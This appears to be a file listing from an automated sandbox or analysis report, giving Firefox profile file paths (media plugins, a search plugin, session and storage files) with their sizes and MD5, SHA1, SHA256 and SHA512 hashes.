C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4i9bphnb.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4i9bphnb.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4i9bphnb.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
12KB
MD56f290e25845197118635e05c04f607e5
SHA15b46c033b29c19dfa7e5eada2d46274da09ce656
SHA25670002cc87afd5830c7aca13244659571e5ba05cf8403206f40928a344ead1ab0
SHA51235cecc1d7ffbf000a6cd07f23e7054e7e4c4d4a5cbc0b6ffa3d6b4ab38271115b1628a305dcb978ccd9eef7e1f32d702f734a7e5800becd93f10c391f0a00f5b
-
Filesize
14KB
MD587a4c929a00c6920521a6b94a6038cea
SHA1b6949f814ba1fb4f921afc57c4fdad0a9000738b
SHA256b0cced72fb6f9ada935837fd5f4c0833a3d36a5beaa4444dc7df672b216b2cee
SHA51264e91b8c3dc977178ce54fb44091c838cbb3b2afd054bd0c38375996e9155a33c0096f77f2a3603ce855aad59089b6dd536199e38eb13ca99458d7f6bf3e9039
-
Filesize
13KB
MD586b62ea61a62892f159031fb7064192a
SHA18fad5d729713ccc8aa583c8da19a8c734dec7a38
SHA256413a6daf8119511dc3ad8ab8dd160ccb5b047c32e10106e35ec99bac1e4adcd3
SHA512a6cb2dddaf19fc873151125dc4bd5b77b681d33e33c12c7288a142f93729e069e3c83403660a8f2c68538de574dfe24529d6bcbea971f792a841aa906f98c97d
-
Filesize
13KB
MD5b30e01802766d7045d23e45af84a8569
SHA17944d8b8d86a464f2001b05ea213b0cd3ba80fee
SHA25623ff3c98fd76ac3ff9e2ff6e24f1b6a065beb28189c646d2759bd384a719d4e0
SHA512031e0ef9871e04eebcb07cbfb17868c707253d54435419ebd8b1ed91163139ee0235d9f0c32d3e38ea521725230e52e51b0dbe3cdaf91178963587e1fd3fea20
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4i9bphnb.default-release\searchplugins\cdnsearch.xml
Filesize1KB
MD52869f887319d49175ff94ec01e707508
SHA1e9504ad5c1bcf31a2842ca2281fe993d220af4b8
SHA25649dd61e19d4541f1e695b66847d0bf99bc08952ba41b33a69c2e297dfa282d15
SHA51263673c1ede47fda14dea78483c6319132a849db3b35953e43704aa49cfb6d14e42d74e0eaf93f4cdb7632c85f368d484ac111687127d2b87a3e264949085c76b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4i9bphnb.default-release\sessionCheckpoints.json
Filesize53B
MD5ea8b62857dfdbd3d0be7d7e4a954ec9a
SHA1b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a
SHA256792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da
SHA512076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4i9bphnb.default-release\sessionCheckpoints.json
Filesize90B
MD5c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA15942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA25600ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA51271ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4i9bphnb.default-release\sessionstore-backups\recovery.baklz4
Filesize4KB
MD547c77a9ae9b46ba58802c9067144bd86
SHA17d2bcc18f848a4996e01657d593047f22446c7ff
SHA2566de6634c3be0c2f5ea63ed0a2e28d5e96c8f343a2dfd69c0da1693183ad7acc1
SHA51246de2c2ee263a1fb1317e143909078208c4354286b0f6468a6f2b3c2a8af5e02f181ebcd62e6bfedf7830c7895bd1fbc406ced0b86bde66c736192084b0f33f2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4i9bphnb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize1.6MB
MD5a73b8a69ea78eed9004e1949ae0c08ed
SHA16593aedacf141d9b6cd45ec1ed63add7c43c8666
SHA256d138dd68ba9feb4250bfc4aac0162642046d3e03d8d3aecdc214750c1b392665
SHA5126c7484a4220cb236ff35cc7b3702998a7c002793e9e80942cbe733810fcd92764f4885f09de9ac47e0b3500019adfb6b7cf0b1d1dd2b94c325e31c524362e12c
-
Filesize
1.1MB
MD5332f6264b2c7b5077b0425b088608c16
SHA1d4f4cf73732c99e4bd7fe13ae282f91c3aa0ea0a
SHA25629bb9448a35fc17717b5aea47f15d1118bb2aa96d6796a1c6620e6974a485553
SHA5124cc7c9fb941c96ec138c8852d4051a4727c1273fdb23adbfee661a925747318094dda2ac32346b602d609376acf3e957766925a352197f32cd37554eb28cb672
-
Filesize
1.1MB
MD58ee97e5b0db7902276aca5892d02ca90
SHA14fcc8451cbf2f09404b405b42e4bb97703fce4a3
SHA25622ee281bc1b69af22388d2bc2dba5d1977e06bc65ff34d34461dc8f827888798
SHA512653ea38b70a5ebe479ad8797a8277e37fd1be4539406ad3661929f206e3a91fe4facbd6d28fffe9a87eb1eafae58e2ccc4b73fd12495abae336dca1af7fd0694
-
Filesize
624KB
MD5427bc48b113ab6f76876b638142714cf
SHA17a3d40f25712ce26adfe5962ad123b51ba0baa6f
SHA256466a3bd558ee7bfaeb0e57c0ba3d824d21fa0f98ead8876fc46a68fa8d0ad987
SHA5128f3b473804afda32b1722424cc0dc1d114720f9e87d148776539a3c849bc420290e2846f61a56cf0b548cd5126b8bd73764fd85812f1b42b8d7053658da1ba59
-
Filesize
7.3MB
MD5bf1d8ffae15f7110a537ad999564ad47
SHA12832960c2d7b10820bca90d2630187a47dc97bae
SHA2569fa8f4b5e8c4b65c1bbdf42cc00e85746fdae29a5c31376839b9eb023968e134
SHA51272e293a1ccc8b55c24897b9c767c99444d987dfa2900f8aa65fecbbe267ad31b6a9daf8eedebf29955b74a8c2af9a2470c2b2eff93b839dd603f4e91967eeaca
-
Filesize
495KB
MD58df4e2af0b1b8d6f69c5ddd4cf19d421
SHA1a1ec774a02c2a20b84c324729d3df882b30ad331
SHA256e53da98f8d8ecf6e3832cb60dfc9b37df9d99fbfd98873fcd3860f4f0637a678
SHA5128b99d2be5f5498c34b40de721cba4c230c5c1f9b74bc58424553e147c71dbfab83ac3cfdb592e614904e277a78c23c99014850eeeb37ac8003cac062df66d826
-
Filesize
10.1MB
MD53b24971c5fef776db7df10a769f0857a
SHA1ab314ddf208ef3e8d06f2f5e96f0f481075de0f4
SHA2560d990bedac4696a67ad46dbc686750086f72f4795ed8a6121782ba3b0dc736b5
SHA512f70dccd6fd95516eac21b0cc30c70fb5f17c3c8f1f3b28fe3bdaec6053c2de53daf68caf422dea8861e4ab84f3dd7be36965c6998c1380dbf2a05a2a74b36b28
-
Filesize
5.2MB
MD5e746c8d92f413c0e6a7bca22dd53d439
SHA140fddfc5a0ae76c1cbba2cc551c11e10d75cc80b
SHA256f6ada2918d5e029eaf58623b7238f95ccce4ad53ee6c6eb7e87524dcdeab3df4
SHA512115898c90444a1773cc2e5a8a98b0e94d65156f5a792f390c8c6cc00fdef73746b3ec8d61399e149eeaec88cc8c977780411f38fc119d5bb35a7703be38efe85
-
Filesize
2.4MB
MD5380d17ae48099065620bf6819a75546e
SHA115287cf99b247c5841ccb5d349cec09f2f8d6842
SHA2561fae7a09da2d90805c3c5ddc97b91d36236171c34e79c8f3a3de945ac2ba25a2
SHA51229f2c8583b179b2fe323383bbdabc2afad54b0744dce2e9c7f642d2f4e2036a241b653a2b9d4f9a8a0072cff7e3bf06257a0bba905f2d3ac76143da06fbe9f2a
-
Filesize
5.0MB
MD563138dfb6f059b316cef364b01ce34e6
SHA15c225a8f99eb3992a0a0ce416648fef02023244d
SHA256d1c5dce3d438c76addcfed20a46330ddadbe829fd49452f5728414057b441923
SHA51269a40a3e156ed950458fc6f79fffd42b2ee67a03be616b2874aa3dd1e60ded73a363e8f8d82543b8b0fa00f626439508f799c06a559e3466b589d7e6d3e1fb78
-
Filesize
526KB
MD50df19439c0f436a7bae7025b6a9c578f
SHA11de01b36b010665bb6aa8260676da4b09c7290ec
SHA2561f6f67ff704b9853850d86480989a904a7b2a8ee8f923ef6932473ba701288af
SHA512a458e0f83d908f788563b744bb129dc889e331cca3ae91812b99356219c816244d5654c0be479c0e099f21382b1dab1d19b9506017bc9d01310163963cf6c7ea
-
Filesize
4.7MB
MD59635389d4492a1bb338d7467cc79a84f
SHA15bf4e06b683c07b6b59da041bc81fdc0e2accf5c
SHA256b4c8cabdb454ad0855960445ebd98b9b7b5fab255c62a36d5b34ae575ccee0f2
SHA512106e536e589a4f76176ea5ecb564f46b6f6d1dda2bf33431fff682a3b2ef8fd4df11b6101118f52e14bb46ea2469697ac5738be07fc97fae28c7ec41dbaa5508
-
Filesize
5.0MB
MD5c4df754c82258cc51d10b790a99fceb6
SHA1cd520373e449c0555cce934c804237b28615e0d5
SHA256c874dc1ac80a989d43c8859285527a789ad0920ef4826a065e25d4139b742f6c
SHA51289fb14392fc8705b8e1e88630f720a798ae1eded9231fcc8673a5a15c659ddea02fdfee20dae3ed2c1aabce93cad790f617bda6d8af2c855b45a45c0eae977fd
-
Filesize
5.0MB
MD51a63157cfa8da3ef2a73813072af3fe2
SHA16b403df67281373d7d09e6f401a8b1eac206acc4
SHA2562d1a08ddfdc0613506720655647d6805ea581a48fd765082c66ec5bc4b07a74a
SHA512e9d1ea95c41e8035176086d69c10b748e9fff3bfa608985e8866ef92ae29109bc77e416a6c9c16b94b8ce093f1751add2aa868c35e4236cdfb2082b4260859d7
-
Filesize
7.3MB
MD5c9ba07553052ed63b92e546370d8da51
SHA148151acd26c827ea1b7c9c346d6b9b17523ffb82
SHA2560f48c2ea5aa9da11e5fffde40b87d2094cc0482951cea9797c1f5ebb5992b947
SHA5121895274b1056e8f4e4fbf10c3487dafc67c08fd64243d586a37ee0ec07131cf42ae612e31f8a860546618b348ff967751f8c2f5c7cf56313418ba46fa1e3cda9
-
Filesize
11KB
MD54df76b3a16d840ccebebd7f080b1f926
SHA1792da850fb79af02e3d6b16804963edaed780a60
SHA256f76e4caaff453862c9a94a96f2568f08435d11fc31c8b6b82a0e7e922c4f97a4
SHA512c5e0038e594d462ccf021ad95698d90866c1d52b85801d6699e7465fb4fb932804e646ae3750973af2ba8eb1dd19ef663dd04c1cbcc8637f6554246495d72f60
-
Filesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005
-
Filesize
306B
MD57534b5b74212cb95b819401235bd116c
SHA1787ad181b22e161330aab804de4abffbfc0683b0
SHA256b05c6723077813dc9b48a2f1142db37ea63c672931d13a74d320f7d006756a04
SHA512ea268788dc59ab78c0aadd4db9bbcf95493bf4eb2b5ae3d592e6876596246832fc574e7bc1348ce7922b32dcedcf71876ff59fb8beace5c06891ec897c9dac51
-
Filesize
306B
MD5b4f590e001dccaf4e6cd8350d5d03269
SHA1c56d80a9179f71794ebec9492a85a35ca9b406dd
SHA2561db599235d581eab065ef2d4add389779c77870aa59d75640f6530c53dfa0ebf
SHA51259037209c033d42b12f2bce1b6794a80947e902ebca8dc620465384e331ff91afc54d9382088731b7965253cc72b35413e6a086e85f0d6d2539029ea28303a10